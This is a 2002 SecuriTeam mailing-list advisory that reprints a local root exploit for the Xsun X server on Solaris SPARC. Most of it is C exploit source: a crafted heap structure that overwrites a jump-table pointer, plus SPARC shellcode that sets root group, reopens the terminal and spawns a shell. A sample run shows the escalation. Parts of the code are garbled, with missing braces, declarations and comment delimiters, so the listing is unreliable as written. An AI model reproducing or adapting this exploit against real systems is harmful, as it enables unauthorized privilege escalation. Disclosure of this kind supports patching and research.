[EXPL] Xsun (Sparc) Local Exploit (RGB_DB)

From: support@securiteam.com
Date: 11/07/02

From: support@securiteam.com
To: list@securiteam.com
Date: 7 Nov 2002 11:00:36 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Xsun (Sparc) Local Exploit (RGB_DB)


Xsun is a Solaris server for X version 11. A vulnerability in Sun's
implementation allows attackers to cause it to execute arbitrary code,
allowing them to gain elevated privileges.


/* Xsun(sparc) local exploit
   by gloomy (gloomy@root66.org) & eSDee (esdee@netric.org)
     Xsun is a Solaris server for X version 11. This program contains
   an option that is not really secure nowadays :).
   The option is used to determine the color database file. And yeah,
   indeed, you guessed it already, it contains a heap overflow.

     When we were busy writing this exploit within a multi display
   screen, we discovered some weird "unable-to-write-over-stackframe"
   problems. We tried everything to just write a few bytes over a
   saved program counter, but unfortunatly it was not possible on the
   current machine we were using. Then eSDee came up with something
   news. In the middle of the night a loud "yippeaaaaaa!" came out
   the bedroom of mister Es. He discovered a little section just
   below the GOT. It didn't contain \0 bytes and it was writeable.
   It's called the ti_jmp_table. I'm sure eSDee will write some
   papers about it soon.

     Gloomy was busy writing a shellcode that re-opens the STDIN. He
   found out that he just could open /dev/tty and then duplicate the
   STDERR filedescriptor, so the important descriptors were back

        ./Xsun-expl [retloc] [ret]

        bash$ gcc -o Xsun-expl Xsun-expl.c -Wall -Werror
        bash$ ./Xsun-expl
        bash$ id
        uid=500(user) gid=0(root)

   Greets and kisses:
        #netric - www.netric.org
        #root66 - www.root66.org
        mostlyharmless- www.mostly-harmless.nl [soon]
        dB_____ - fijne broer van gloom-ei! :)
        squezel - lekker ventje ben jij.

   More information available at:

   [ps. wat een lompe text]

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define PATH"/usr/openwin/bin/Xsun"
#define DISPLAY ":1"
#define SIZE5128

#define RET 0xffbef7bc
#define RETLOC0xfecbea30/* <ti_jmp_table+4> (a pointer to _retu
rn_zero) */
#define DUMMY 0xac1db0ef

struct WORD {
        long element;
        long dummy;

struct TREE {
        struct WORDt_s;/* size of this element */
        struct WORDt_p;/* parent node */
        struct WORDt_l;/* left child */
        struct WORDt_r;/* right child */
        struct WORDt_n;/* next in link list */
        struct WORDt_d;/* dummy to reserve space for self-pointer */


                setregid(0,0);setting root permission
                open("/dev/tty", RD_ONLY);re-open STDIN
                dup(2); duplicate STDOUT to STD
                execve("/bin//sh", &argv[0], NULL); start the shell
                exit(); exit

        "\x90\x1d\x80\x16"// xor%l6, %l6, %o0
        "\x92\x1d\x80\x16"// xor%l6, %l6, %o1
        "\x82\x18\x40\x01"// xor%g1, %g1, %g1
        "\x82\x10\x20\xcb"// mov0x2e, %g1
        "\x91\xd0\x20\x08"// ta 8 [setreg

        "\x21\x0b\xd9\x19"// sethi%hi(0x2f646400), %l0
        "\xa0\x14\x21\x76"// or %l0, 0x176, %l0
        "\x23\x0b\xdd\x1d"// sethi%hi(0x2f747400), %l1
        "\xa2\x14\x60\x79"// or %l1, 0x79, %l1
        "\xe0\x3b\xbf\xf8"// std%l0, [ %sp - 0x8 ]
        "\x90\x23\xa0\x08"// sub%sp, 8, %o0
        "\x92\x1b\x80\x0e"// xor%sp, %sp, %o1
        "\x82\x10\x20\x05"// mov0x05, %g1
        "\x91\xd0\x20\x08"// ta 8 [open("

        "\x90\x10\x20\x02"// mov0x02, %o0
        "\x82\x10\x20\x29"// mov0x29, %g1
        "\x91\xd0\x20\x08"// ta 8 [dup(2)

        "\x21\x0b\xd8\x9a"// sethi%hi(0x2f626800), %l0
        "\xa0\x14\x21\x6e"// or %l0, 0x16e, %l0
        "\x23\x0b\xcb\xdc"// sethi%hi(0x2f2f7000), %l1
        "\xa2\x14\x63\x68"// or %l1, 0x368, %l1
        "\xe0\x3b\xbf\xf0"// std%l0, [ %sp - 0x10 ]
        "\xc0\x23\xbf\xf8"// clr[ %sp - 0x8 ]
        "\x90\x23\xa0\x10"// sub%sp, 0x10, %o0
        "\xc0\x23\xbf\xec"// clr[ %sp - 0x14 ]
        "\xd0\x23\xbf\xe8"// st %o0, [ %sp - 0x18 ]
        "\x92\x23\xa0\x18"// sub%sp, 0x18, %o1
        "\x94\x22\x80\x0a"// sub%o2, %o2, %o2
        "\x82\x18\x40\x01"// xor%g1, %g1, %g1
        "\x82\x10\x20\x3b"// mov0x3b, %g1
        "\x91\xd0\x20\x08"// ta 8 [execve

        "\x82\x10\x20\x01"// mov0x01, %g1
        "\x91\xd0\x20\x08"// ta 8 [exit(?

        "\x10\xbf\xff\xdf"// bshellcode
        "\x90\x1d\x80\x16"; // or %o1, %o1, %o1

main(int argc, char *argv[])
        struct TREE faketree; // our friendly little

        char buffer[SIZE+sizeof(faketree)+1];

        unsigned int ret= RET;
        unsigned int retloc = RETLOC;
        unsigned int dummy= DUMMY;

        if (argc > 1) retloc= strtoul(argv[1], &argv[1], 16);
        if (argc > 2) ret = strtoul(argv[2], &argv[2], 16);

        faketree.t_s.element = 0xfffffff0;
        faketree.t_s.dummy = dummy;
        faketree.t_n.element = retloc - 8;
        faketree.t_n.dummy = dummy;
        faketree.t_l.element = 0xffffffff;
        faketree.t_l.dummy = dummy;
        faketree.t_r.element = dummy;
        faketree.t_r.dummy = dummy;
        faketree.t_p.element = ret;
        faketree.t_p.dummy = dummy;
        faketree.t_d.element = dummy;
        faketree.t_d.dummy = dummy;

        memset(buffer, 0x41, sizeof(buffer));
        memcpy(buffer + 3999 - (strlen(shellcode) - 8), shellcode,
        memcpy(buffer + SIZE, &faketree, sizeof(faketree));
        buffer[SIZE + sizeof(faketree)] = 0x0;

        fprintf(stdout, "Retloc = 0x%08x\n"
                        "Ret= 0x%08x\n",
                        retloc, ret);

        execl(PATH, "Xsun", "-co", buffer, DISPLAY, NULL);
        return 0;

/* [eof] */


The information has been provided by <mailto:gloomy@root66.org> gloomy
and <mailto:esdee@netric.org> eSDee.


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com


The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.